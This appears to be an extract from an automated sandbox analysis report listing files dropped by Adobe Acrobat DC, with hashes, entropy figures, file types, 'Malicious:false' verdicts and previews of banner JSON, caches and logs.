        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJfPmwrPeUkwRe9:YvXKXRq2Zc0vZGH56Ukee9
        MD5:4E70B4AE9421905F73796E1DE08A30C9
        SHA1:F03F176B6D65DAAF53538A43BA97CEDDA5862088
        SHA-256:AA54ACA5C6722B1D7188D742DC729CA7F2BAAE75D5BFDAC0B91AFB9008411354
        SHA-512:A4F6DD665ECD6FBF44AEBC55C7836E33646C3EF1703FAA54AF51C130F4F6FB3B8536D2787450EBB5B27419010315F49EAB183D7C91E10E07ED4C8715A1784889
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):1123
        Entropy (8bit):5.6883550375842225
        Encrypted:false
        SSDEEP:24:Yv6XA2zv+pLgE9cQx8LennAvzBvkn0RCmK8czOCCSd:YvK2hgy6SAFv5Ah8cv/d
        MD5:3C66B02BE13BD9EAFC8AE997F4769F27
        SHA1:6721FD715B2F5A048893352DAEDADEA8BCB7BA25
        SHA-256:F8FFDF5839B45C7F6519C9A830D467597C46D76A94239062AFB8C5C14A517787
        SHA-512:C7695E3CDE007EBD2ADD9D17AFB197392FECE0DDACBCB202DF3258F66EF35C67D910D348099630F398037F2E6606BF879F30A213DAF0790459A1B1C6BA6DCBC4
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):289
        Entropy (8bit):5.295379206631923
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJf8dPeUkwRe9:YvXKXRq2Zc0vZGU8Ukee9
        MD5:DC12A08A31BF58A8ED795A889CC7753B
        SHA1:C985A125DE0C404A51A5BED22A48E07BFC2728A2
        SHA-256:B473E618FE0A119A3DDB95A8AC5B639BE583DEA35263C695501BEBCB1C0CB865
        SHA-512:BC3F5126A5DBE233F43C4BA9AFD665FEF18CF2F68A25F9A1C980C6FAB17D46B72E6460A0C7433E874E0BB351837C5546E122C99872DA4F9B691F0811754964F4
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):292
        Entropy (8bit):5.300217912332929
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJfQ1rPeUkwRe9:YvXKXRq2Zc0vZGY16Ukee9
        MD5:08EF7EBBA5D2F7FF93670CAEA84412AA
        SHA1:5A84310923AE0344F60A96C704EA02A4097743B0
        SHA-256:0C5A4CB5FB059D7F9A79EBB6B1DD13E73B7250836CBE2405CB7057C02DE379E6
        SHA-512:50CE653548220624AD19895DE2553E8D1C3A32A1C6876F88EE32751575954621BC92DC972A5CD4F9BA14B87F7C97F69407914E0E7327D55C968D8474A881E6F9
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):289
        Entropy (8bit):5.303346353525216
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJfFldPeUkwRe9:YvXKXRq2Zc0vZGz8Ukee9
        MD5:0997FA4D400AB2F8CE59FDA5C39E251B
        SHA1:838995EA41CD99E98CBD45A8A5746B844A7F98BA
        SHA-256:D1CFF5FB49126B4D7105453795CF5674CCD958BDA4062231D4EFBD74DEF893DE
        SHA-512:D9A46843365E169B41D89DCB11DEEC9EFF2D13F95A97AE7584E45CD40BA5466ADFCCDF2A3D0A803D6D21D88A32A731C4254B63D65CFF818B2661CD8A7307D6A0
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):295
        Entropy (8bit):5.320824326396336
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJfzdPeUkwRe9:YvXKXRq2Zc0vZGb8Ukee9
        MD5:EC657138C8831CFF9CE0D135A684E452
        SHA1:CC560AC38DB3FA22D4044A19FD45E3F1ED3E47D9
        SHA-256:DE500B1B346EB80DCB409FEC5C81AF0E6F397BC10686E97E050C632F8C193D7A
        SHA-512:668BC53A560D3124AC50F2F2E9DD3A0B2229479174690700E7444A382BB0DB5D66A38FA18D2403AE53412CB418CDBB767C58E61FA94809903850910542565717
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):289
        Entropy (8bit):5.3017758727604285
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJfYdPeUkwRe9:YvXKXRq2Zc0vZGg8Ukee9
        MD5:0A04CAE3AC43EB949EEE05A81F6CE2D5
        SHA1:A5281BF016A9638641F59059481CA44F3D4EA0CE
        SHA-256:F691266F6C4E6018F7BD47EF308B7FFF3543CC1F10E798F46BB3E8FD75766A12
        SHA-512:68FC27E7B243D5836994E7605B748156CA00898D48846746D679BD415066A241BEF2E34F244C8FFA3953268DE8756A6524A3C644C05A0252383729F2204C990A
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):284
        Entropy (8bit):5.287539809415761
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJf+dPeUkwRe9:YvXKXRq2Zc0vZG28Ukee9
        MD5:1638FA92CF0EC2AAE521978310EB4E30
        SHA1:DDB6CD5875184E58A6FCD3972BC5B639E0FA688F
        SHA-256:2AC7616F9FE2840320DAF73F19A66E59CEEC268584B75CCBE3AD9BF8BFFE9470
        SHA-512:21D13307F5BAC0441D77C70E8442DD4E26D5B3EB10B7260FEDFB24671DD6EA08F9ACA75C7CA406BCF7731FA402ADFD178184FFDBBD16C968D2BDB85FDB46B45F
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):291
        Entropy (8bit):5.2853107651232225
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJfbPtdPeUkwRe9:YvXKXRq2Zc0vZGDV8Ukee9
        MD5:546ED99C4E717702E978B691AF659332
        SHA1:998617F950C00E080C4DB2A13B469B079E661166
        SHA-256:21B66921A36F614B98206EF5922DA1E68AFD86C093F3FD8885ABBF64EE7801F2
        SHA-512:DC06BD49D07A85D338AE0F2F758B61BE454C8D15C0184F7E1DAB96CD58BCA9ADEC64A845D57BF0BA2F4E634D95993C1DFFAEAFA933012314E1A25CD7E1005EB6
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):287
        Entropy (8bit):5.290282664077384
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJf21rPeUkwRe9:YvXKXRq2Zc0vZG+16Ukee9
        MD5:12B282ABFFC564132CD62D826F81AFC7
        SHA1:65C3B0F3E3DEE24E6C217D0E9D055E58388B42A9
        SHA-256:86AB7CB612E3B4B0A0F07BB7DE7854DCF37341F885DCF6BDEF96F8256B4F095C
        SHA-512:1870ADBE2F36C08F2C0F7019B5B6EB89B868C515616041E657A1FACF9324FD8B83F4A3F3DC3EC036B064E2B326CFA78FD7B64BE0FA44EB20785B9D8471040425
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):1090
        Entropy (8bit):5.663283446647412
        Encrypted:false
        SSDEEP:24:Yv6XA2zviamXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSd:YvKkBgkDMUJUAh8cvMd
        MD5:7AD8FA4272A61EBCEE55C7D63A7D82E8
        SHA1:9BA69E88D9A3782A3C369D04E20A9646CA96464E
        SHA-256:E1BCC8FE250C40F7E7E2C173A55B5EB0E7E8972D614DDA989629D5BB84A5D18D
        SHA-512:427EDE7C068BF9417B947F0AF0E53E3636E0C342917759F984AD8227089A720FBAF4C1A8552EFE46038EE78C8DD83053D5184EA58AF6E20C82BA3746C2CE2678
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):286
        Entropy (8bit):5.2641773496079
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJfshHHrPeUkwRe9:YvXKXRq2Zc0vZGUUUkee9
        MD5:2930F50DF88517D2BA8927E736E2A7DD
        SHA1:060BBEA3F351FF4114139F345AF17AA9A2AF961F
        SHA-256:2CEF41894D3EA484A65C2FBD2B56D245EDDB32D42F6C472E32A36FE528256963
        SHA-512:5B40BB50EDBA2F217427CC5D7AEFCACEDD84159C99215143979854BA01DEA9C52BDEC7D3E77A57D965EE950B3051282C56FCB262B190DA46CBA8925976464B09
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):282
        Entropy (8bit):5.27508196484293
        Encrypted:false
        SSDEEP:6:YEQXJ2HXpscFqBHVDVoZcg1vRcR0Yr5oAvJTqgFCrPeUkwRe9:YvXKXRq2Zc0vZGTq16Ukee9
        MD5:7B3BC7A532CBC408DBFB99116BB53820
        SHA1:0579FDADBA58C57E972002F581637AF48326757E
        SHA-256:119FA75C5E0A77EC317C52C695061F788386F54E821302C2C2E85CA95A99FC8B
        SHA-512:63D4D360A8559FFC7775934B1BF42E0BE43B961DDEE0A9AAFD6899AA8CEB78DDE53BA62818AA82F2E309D8C117B3F5375652E005B8B6383F91E28EB40257B348
        Malicious:false
        Preview:{"analyticsData":{"responseGUID":"313554b1-9bc0-4a1d-95a0-d714db3721ba","sophiaUUID":"BB455677-E4C2-45EB-A908-4974DBA96F4C"},"encodingScheme":true,"expirationDTS":1736449077075,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:data
        Category:dropped
        Size (bytes):4
        Entropy (8bit):0.8112781244591328
        Encrypted:false
        SSDEEP:3:e:e
        MD5:DC84B0D741E5BEAE8070013ADDCC8C28
        SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
        SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
        SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
        Malicious:false
        Preview:....
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:JSON data
        Category:dropped
        Size (bytes):2814
        Entropy (8bit):5.128714160444445
        Encrypted:false
        SSDEEP:24:YwbYataymw/KRqLE6cBWd24jpj0Ssa3As2Q2LSeC7FhSVXapEwHn5yRhbR9+TwBz:YwCwXLEBkdTtRkWF8VXnwHMfbR9+TwBz
        MD5:2D027318113790FB7ED072F992B1D599
        SHA1:9402D5F4C8B57FD34240473A56CD05B2F13F3AE2
        SHA-256:814A9B5A4757AA9F168C3E28E259A92C2B1ADA678EF201677C886B89ABF0A100
        SHA-512:BDB5F6EA869A15D5C47120F14B3D0C451DB74CB10F092013CDFDD3E035A24DC22F54AD3B9677BC26DD6925D6A5093CAF869E256554EAFB1FBAE3634C145DA2C3
        Malicious:false
        Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"6f13e0ef734ee38c4bcfacdfe7206119","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":289,"ts":1736275736000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"d2f246b1b6c4d760ac84933cc23ed7fa","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1736275736000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"6b2d06ad30cbafc4f5a77e4168ed7e72","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1736275736000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"9a105115830dff747203852371a4a8dd","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":295,"ts":1736275736000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"28cce68aae6d843e0a616d0bda192a70","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file","size":292,"ts":1736275736000},{"id":"DC_Reader_More_LHP_Banner","info":{"dg":"30fbc4c5d42f30f812316c13f32ab1a7","sid":"DC_Reader_More_LHP_Banner"},"mimeType":"file","
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 25, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 25
        Category:dropped
        Size (bytes):12288
        Entropy (8bit):1.188701118916867
        Encrypted:false
        SSDEEP:48:TGufl2GL7msEHUUUUUUUULSvR9H9vxFGiDIAEkGVvpn:lNVmswUUUUUUUUL+FGSItj
        MD5:C79671FEBD86EDF8BF38CBA5744B0907
        SHA1:86BBF80ABD0BBA4B9C849103F5C842416573D223
        SHA-256:ACE78393B86B4A9239007E4AD17F38A24ACD0CE7A251535E2DDC4A4276C78A03
        SHA-512:8B46AFBFC2E0A770081EF81A879227F19169D495B794552CD97DFE1A451C157D17F9EB3A0999D2262EDF67F4EEA13AF2BC9F14066D64556A7D74080610D97B1B
        Malicious:false
        Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:SQLite Rollback Journal
        Category:dropped
        Size (bytes):8720
        Entropy (8bit):1.6054227974369017
        Encrypted:false
        SSDEEP:48:7MqKUUUUUUUUUUfvR9H9vxFGiDIAEkGVvaRqFl2GL7msi:7yUUUUUUUUUUXFGSItwRKVmsi
        MD5:0581B3253F58827C5A8FC784ED4D96FF
        SHA1:58B5A66FD8E9847CCFA242813F4D945EA9DD6A92
        SHA-256:CE8A164934352C36EA0D3B26D714880773CAFEC9ED1AF34EB88469C8D215532E
        SHA-512:DD21007E4E835AF22FAFCFEF2214E2D03A6CFCB0B00F0FBB14DD1A6C203E7F417B84F0D6B589861567AB88F76D4715211322293AD0ADFBC2FDA6C40C3EC6F9E8
        Malicious:false
        Preview:.... .c.......r.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................f.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:data
        Category:dropped
        Size (bytes):66726
        Entropy (8bit):5.392739213842091
        Encrypted:false
        SSDEEP:768:RNOpblrU6TBH44ADKZEg2meopbbI6hrZDD74Jn43xLZ7eYHbYyu:6a6TZ44ADEtxpbbI6rD777i+bK
        MD5:1DAC9C11197B05B05212D92852FBC031
        SHA1:C1BB11F7C6EBCA2D68472DC13AC9C48638588F43
        SHA-256:78BE0F36FDCEB0DB23C5F10EBD1242C8EFE6B488EDB19CDAA1899F62E9EC24D1
        SHA-512:F5111D39C73FBB694561289E675A15C1DB94FD0997DD73B026679380537C331A8C8404DE9EEC8C6AD240CA935F0E53D8CA9A6D6E55BCAEDBD5DDE5B456DEE12E
        Malicious:false
        Preview:4.397.90.FID.2:o:..........:F:AgencyFB-Reg.P:Agency FB.L:$.........................."F:Agency FB.#.96.FID.2:o:..........:F:AgencyFB-Bold.P:Agency FB Bold.L:%.........................."F:Agency FB.#.84.FID.2:o:..........:F:Algerian.P:Algerian.L:$..........................RF:Algerian.#.95.FID.2:o:..........:F:ArialNarrow.P:Arial Narrow.L:$.........................."F:Arial Narrow.#.109.FID.2:o:..........:F:ArialNarrow-Italic.P:Arial Narrow Italic.L:$.........................."F:Arial Narrow.#.105.FID.2:o:..........:F:ArialNarrow-Bold.P:Arial Narrow Bold.L:%.........................."F:Arial Narrow.#.118.FID.2:o:..........:F:ArialNarrow-BoldItalic.P:Arial Narrow Bold Italic.L:%.........................."F:Arial Narrow.#.77.FID.2:o:..........:F:ArialMT.P:Arial.L:$.........................."F:Arial.#.91.FID.2:o:..........:F:Arial-ItalicMT.P:Arial Italic.L:$.........................."F:Arial.#.87.FID.2:o:..........:F:Arial-BoldMT.P:Arial Bold.L:$.........................."F:Arial.#.100.FID.2
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
        Category:dropped
        Size (bytes):246
        Entropy (8bit):3.536003181970279
        Encrypted:false
        SSDEEP:6:Qgl946caEbiQLxuZUQu+lEbYnuoblv2K8yQpClEfww:Qw946cPbiOxDlbYnuRKTWDYw
        MD5:D271A0D794A14D6A2119D97FC793E95A
        SHA1:1F47B278928514E2B548159A4164EFA770B2C893
        SHA-256:DE33163CC57CD0473FF4D77F24FBB1BA6B62D4CED5971925A5476355CA37337E
        SHA-512:CC7EDD60436A537E08C4F4A690C50401E9FDDC4DD4A76CE756EB5DDF29D9FE10A0D098FFC5B181590FCC58D2EBBE530E55CFB8B90B0EB53E0493CA43343CE5D0
        Malicious:false
        Preview:..E.r.r.o.r. .2.7.1.1...T.h.e. .s.p.e.c.i.f.i.e.d. .F.e.a.t.u.r.e. .n.a.m.e. .(.'.A.R.M.'.). .n.o.t. .f.o.u.n.d. .i.n. .F.e.a.t.u.r.e. .t.a.b.l.e.......=.=.=. .L.o.g.g.i.n.g. .s.t.o.p.p.e.d.:. .0.7./.0.1./.2.0.2.5. . .1.3.:.4.8.:.5.8. .=.=.=.....
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:Zip data (MIME type "application/vnd.adobe.air-ucf-package+zip"?)
        Category:dropped
        Size (bytes):144514
        Entropy (8bit):7.992637131260696
        Encrypted:true
        SSDEEP:3072:OvjeSq37BcXWpJ/PwBI4lsRMoZVaJctHtTx8EOyhnL:Cjc7BcePUsSSt38snL
        MD5:BA1716D4FB435DA6C47CE77E3667E6A8
        SHA1:AF6ADF9F1A53033CF28506F33975A3D1BC0C4ECF
        SHA-256:AD771EC5D244D9815762116D5C77BA53A1D06CEBA42D348160790DBBE4B6769D
        SHA-512:65249DB52791037E9CC0EEF2D07A9CB1895410623345F2646D7EA4ED7001F7273C799275C3342081097AF2D231282D6676F4DBC4D33C5E902993BE89B4A678FD
        Malicious:false
        Preview:PK.........D.Y...>)...).......mimetypeapplication/vnd.adobe.air-ucf-package+zipPK.........D.Y.+.`............message.xml.]is.8...[.....Oq.'...S...g.X+;....%X."U$.....}.P.%....8.tl. ...../..}......A.......,...a...r.....=..i{......0H..v.g.c0.3~....G.b....,.BvJ.'./.`xJ]..O./.!K...XG?.$.,=.Z...q.f~...,..:b.Pl..f..|....,.A.....Z..a<.C._..../G|....q.....~.?...G.............y+.. ...s.,.2...^uon..:....~....C....i.>.<hy..x..?....F.w..4e.|.'...#?..a......i...W.".+...'.......,..6..... ..}.........llj.>.3v.."..CdA.".....v...4H..C]>........4..$.O........9._..C{(....A~.k...f.x8.<... l!..}...ol.q.......2.s.Y..&:....>...l.S..w.t^D.C....]0......L...z[`J<.....L.1t-.Z.n..7.)...aj;.0.r|.._.V......JWT.>.p.?s....boN.....X.jkN.9..3jN.9..t...o..c.nX4......0.D.....Cv .....!k..........d.1B....=3.Bq.E.bo.....6..r..6@.b...T......Ig...(..(K].:...#..k..q2G."o.Tz...qJ.......;?|~..1...J...RA...'..*C...T...dNMZ.3.z-..LCI..I..-.,.Y.J.....m.KY}.Lw......G........-.(E....b..^..}..
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:ASCII text, with very long lines (393)
        Category:dropped
        Size (bytes):16525
        Entropy (8bit):5.345946398610936
        Encrypted:false
        SSDEEP:384:zHIq8qrq0qoq/qUILImCIrImI9IWdFdDdoPtPTPtP7ygyAydy0yGV///X/J/VokV:nNW
        MD5:8947C10F5AB6CFFFAE64BCA79B5A0BE3
        SHA1:70F87EEB71BA1BE43D2ABAB7563F94C73AB5F778
        SHA-256:4F3449101521DA7DF6B58A2C856592E1359BA8BD1ACD0688ECF4292BA5388485
        SHA-512:B76DB9EF3AE758F00CAF0C1705105C875838C7801F7265B17396466EECDA4BCD915DA4611155C5F2AD1C82A800C1BEC855E52E2203421815F915B77AA7331CA0
        Malicious:false
        Preview:SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:088+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=f94b8f43-fcd8-49f4-8c6e-bbf5cd863db9.1696420882088 Timestamp=2023-10-04T13:01:22:089+0100 ThreadID=3400 Component=ngl-lib_NglAppLib Description="SetConfig:
        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
        File Type:ASCII text, with very long lines (393), with CRLF line terminators
        Category:dropped
        Size (bytes):15114
        Entropy (8bit):5.364116924400876
        Encrypted:false
        SSDEEP:384:nYmZQZ/ZIOiOtO/uOVft5fjfQfGftfLfSfKWnh7C9Cxjg8s8L8K8rcGVGhGbG93e:n3mhO18suAl5LIulzaS2dakcLsHdiqAv
        MD5:FE49C701B701B275290971C5249CB5F8
        SHA1:02ACDFA8852A26703FACA0917549161B554105B3
        SHA-256:87F91C764C342D4BDF924507AD38838A36986F44B9920DC8BC5E6F0EA7389D85
        SHA-512:32CB85B3080362480F8DFB101F94281AF27646C1E936430AC954CFEFE7D49F8CE1F46B6E4BDCE5CAB977A1484764E40675071834572F5A415FEDCF9608481201
        Malicious:false
